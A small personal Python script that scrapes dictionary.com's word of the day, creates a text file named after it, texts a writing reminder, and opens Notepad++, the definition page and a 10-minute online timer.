# Day, and timer for creative writing. Text me a reminder import requests, bs4, os, subprocess, webbrowser, textme, time, random # Change directory to writing folder os.chdir(r'D:\DOCUMENTS\Songs\Object writing') # Request URL for dictionary.com word of the day url = 'http://www.dictionary.com/wordoftheday/' res = requests.get(url) res.raise_for_status() # Find word of the day in html soup = bs4.BeautifulSoup(res.text, 'html.parser') word = soup.find('strong').text # Create text file with word of the day file-name, and word at top of text file file = open(word + '.txt', 'a') file.write(word + '\n\n') file.close() # Text me for reminder textme.textme('Time to write!') # After text, wait 15 - 30 seconds, then open text file, website for word definition, then timer time.sleep(15) subprocess.Popen( ['C:\\Program Files (x86)\\Notepad++\\notepad++.exe', f'{word}.txt']) webbrowser.open('http://www.dictionary.com/wordoftheday/') webbrowser.open('https://www.online-stopwatch.com/timer/10minutes/')